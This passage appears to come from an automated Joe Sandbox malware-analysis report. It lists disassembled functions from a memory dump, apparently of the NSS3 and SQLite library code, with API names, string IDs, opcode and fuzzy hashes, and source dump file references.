                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                          • String ID: h(Nl$h(Nl
                                                                                                                                                                                                                          • API String ID: 1297977491-2521858428
                                                                                                                                                                                                                          • Opcode ID: cce3d06f8a224ccd7c9337c3bcf761ff712d92238b615a7a4621d0531935bc33
                                                                                                                                                                                                                          • Instruction ID: aa98a626c2bb445be70112d200948cd10a362eedee112c5164484828eb4b9570
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cce3d06f8a224ccd7c9337c3bcf761ff712d92238b615a7a4621d0531935bc33
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CA13C71B0125A9FCF08CF99C890EEEB7B6BF8C315B158169E915A7701DB35AC11CBA0
                                                                                                                                                                                                                          Function 6C404DB0 Relevance: 5.3, Strings: 4, Instructions: 318COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0Xl$PXl$pXl$winUnlockReadLock
                                                                                                                                                                                                                          • API String ID: 0-3226063409
                                                                                                                                                                                                                          • Opcode ID: af054575a39848dd6bf195747020576d13d322c737637f3ae840f671339e2b7a
                                                                                                                                                                                                                          • Instruction ID: f843182687a204203666e95003b2513f3c936c0f0dacbd241997615a7e5ab72f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af054575a39848dd6bf195747020576d13d322c737637f3ae840f671339e2b7a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25E13F70A187408FDB04DF28D885A5ABBF0FF89314F12962DE89997351E770A985CF86
                                                                                                                                                                                                                          Function 6C406F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
                                                                                                                                                                                                                          • API String ID: 0-3485574213
                                                                                                                                                                                                                          • Opcode ID: af372d97726ed1e5e114c16b70f6d8757a8c998c6574d7665910bb1088b05304
                                                                                                                                                                                                                          • Instruction ID: 844af440bcfc91da027a34ac96f9f379025b6a92f189cc433d7a0c2dd5d9b45b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af372d97726ed1e5e114c16b70f6d8757a8c998c6574d7665910bb1088b05304
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A716772F882114BEB14CB28C880F9A73A29B85314F294278CD59AFBD2D6719C4787D2
                                                                                                                                                                                                                          Function 6C423EC0 Relevance: 4.3, Strings: 3, Instructions: 583COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: sqlite_$sqlite_master$sqlite_temp_master
                                                                                                                                                                                                                          • API String ID: 0-4221611869
                                                                                                                                                                                                                          • Opcode ID: 7d32483ec72bcb56158b70ed138bc8abc1cccaf968a23ae8e5e98d77eb964643
                                                                                                                                                                                                                          • Instruction ID: bd17d308d64e1fe294fac60b6965b5cc5a60c333e6912e86e4f2570573219a91
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d32483ec72bcb56158b70ed138bc8abc1cccaf968a23ae8e5e98d77eb964643
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54229F307491654FE714CB658462EBA7BF2DF4639AB2C6598C9E19FF42C22DEC42C780
                                                                                                                                                                                                                          Function 6C55BE70 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 1029COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: `
                                                                                                                                                                                                                          • API String ID: 0-2679148245
                                                                                                                                                                                                                          • Opcode ID: 63d8633aa3f0d705b2d0fc2c2041d3ecd02ce23ed30f15c510940298f9088538
                                                                                                                                                                                                                          • Instruction ID: b035e4fbc83b70ba6a3e93836929ead1bbcacc83f082a1469818d63af81fc6a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63d8633aa3f0d705b2d0fc2c2041d3ecd02ce23ed30f15c510940298f9088538
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB926F74E002498FDB05DF58C890BAEB7B2FF88308F68416AD415ABB91D735EC56CB90
                                                                                                                                                                                                                          Function 6C3F3D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: htonl
                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                          • API String ID: 2009864989-4108050209
                                                                                                                                                                                                                          • Opcode ID: febb16d6851d71d2a85959a04d55bc899c68e0da9d3be6e651c0407e470bdcf7
                                                                                                                                                                                                                          • Instruction ID: c79d42dea9a6150444622a4377f15423e0aee05e6fa30d5ca8b3a659235a88ce
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: febb16d6851d71d2a85959a04d55bc899c68e0da9d3be6e651c0407e470bdcf7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F514B33F490798ADB95457C88603FFFBB19F92318F184B29C5B1A7AC0C23545478BA2
                                                                                                                                                                                                                          Function 6C49EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49F019
                                                                                                                                                                                                                          • PK11_GenerateRandom.NSS3(?,00000000), ref: 6C49F0F9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorGenerateK11_Random
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3009229198-0
                                                                                                                                                                                                                          • Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                                                                                          • Instruction ID: 809931b612ec586eea2ccb5530e3f81d630c9c8a1c5f9de83fbd285a8c14a958
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F91A371E012268BDB14CF68C891EAEBBF1FF85324F14462DE56697BC0D730A905CB91
                                                                                                                                                                                                                          Function 6C4C2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C4E7929), ref: 6C4C2FAC
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C4E7929), ref: 6C4C2FE0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2619118453-0
                                                                                                                                                                                                                          • Opcode ID: 8b5c7d0f0ef03b8a6b17060c81cdbe4920eefee8d30fdc52c764c7c1c990b025
                                                                                                                                                                                                                          • Instruction ID: 34fd959a78b580e4b669fb69a48dee0d48226a71e59c818bd42528189841e04b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b5c7d0f0ef03b8a6b17060c81cdbe4920eefee8d30fdc52c764c7c1c990b025
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4151F37AB059118FD710CE5AC880FEA73B1FB4531AF254129D9099BB26CB31ED46CB83
                                                                                                                                                                                                                          Function 6C4CED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C4CEE3D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Alloc_ArenaUtil
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2062749931-0
                                                                                                                                                                                                                          • Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                                          • Instruction ID: a8788998a6fd76f563cbe1600050f283c24e53028c96ac3c35cd570e985233b8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7371E176F017018BD718CF19C8C1F6ABBF2AB88304F14862DD85A97BA1D734E901CB92
                                                                                                                                                                                                                          Function 6C3F5F30 Relevance: 1.6, APIs: 1, Instructions: 350stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 6C3F6013
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1004003707-0
                                                                                                                                                                                                                          • Opcode ID: 840eb637dfe9c570d2c6647f456a73852aee039d081ced33e9a46e91c3500f5d
                                                                                                                                                                                                                          • Instruction ID: de3f0e9d31e7882b831b8b3ca32eedcb1b416a2f90dbc4e43250c8a533c0f382
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 840eb637dfe9c570d2c6647f456a73852aee039d081ced33e9a46e91c3500f5d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99C10670B046068BEB04CF55C8507AAB7B2AF85318F248A69D9B5D7B52D736E843CF90
                                                                                                                                                                                                                          Function 6C585E60 Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C585B90: PR_Lock.NSS3(00010000,?,00000000,?,6C46DF9B), ref: 6C585B9E
                                                                                                                                                                                                                            • Part of subcall function 6C585B90: PR_Unlock.NSS3 ref: 6C585BEA
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000014,00000000,-000000D7,?,?,?,?,?,?,?,?,6C585E23,6C46E154), ref: 6C585EBF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LockUnlockmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1725470033-0
                                                                                                                                                                                                                          • Opcode ID: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
                                                                                                                                                                                                                          • Instruction ID: f4495ee446a192ce67095fecb5c3b3f76a53c03df69ee3767f01726c255fc93f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1951ADB2E0122A8FDB18CF59CC815AEF3B2FF88314B59456DD816B7745E730A941CBA0
                                                                                                                                                                                                                          Function 6C53DCD0 Relevance: .4, Instructions: 371COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 34d7ca0ceb17a1a302ae869c6a2d63744bc39f6d42108fc73a8c1ac198d537cb
                                                                                                                                                                                                                          • Instruction ID: 491a7721688c42d8347d907df5f11014933312a04e7844ab959fd5bf05349627
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34d7ca0ceb17a1a302ae869c6a2d63744bc39f6d42108fc73a8c1ac198d537cb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3F14B71A01215CFDB08CF19C884BAA77B2BF89314F298168D8099F751EB75ED42CBD1
                                                                                                                                                                                                                          Function 6C4D1DC0 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
                                                                                                                                                                                                                          • Instruction ID: fd57fcd32a7b9346ac8f5266c1873689f20a672c42ab38db9a1497f273de3882
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18D14632A046568BDB11CE18C8A4FDA7763AB85338F1A4329DD651B7C2C77ABD06C3D0
                                                                                                                                                                                                                          Function 6C468EA0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3ab0e84a488cee959b35fcaef245c91779c5305976c1e59583ff95b8ddef9bd4
                                                                                                                                                                                                                          • Instruction ID: 8d751254f5ad44682fe689a5ba1be565b54bea5321856b842014a88d76f5698e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ab0e84a488cee959b35fcaef245c91779c5305976c1e59583ff95b8ddef9bd4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42119D72A002158BD708CF26D888F5AB3B5BF42319F05426AD8158FF56D775E886C7C5
